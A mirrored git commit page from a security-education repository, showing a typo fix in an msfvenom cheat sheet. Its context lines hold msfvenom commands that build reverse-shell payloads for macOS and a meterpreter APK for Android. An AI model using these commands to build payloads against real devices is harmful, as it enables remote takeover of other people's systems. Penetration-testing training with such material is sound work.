mirror of
https://github.com/The-Art-of-Hacking/h4cker
synced 2024-11-10 05:34:12 +00:00
Update msfvenom.md
This commit is contained in:
parent
5fc53941a9
commit
14129a6d42
1 changed files with 1 additions and 1 deletions
|
@ -12,7 +12,7 @@ MsfVenom is a Metasploit standalone payload generator as a replacement for msfpa
|
|||
- `msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho`
|
||||
- Creates a simple TCP Shell for Mac
|
||||
- `msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk`
|
||||
- Creats a simple TCP Payload for Android
|
||||
- Creates a simple TCP Payload for Android
|
||||
|
||||
## Web Payloads
|
||||
Command Info
|
||||
|
|
Loading…
Reference in a new issue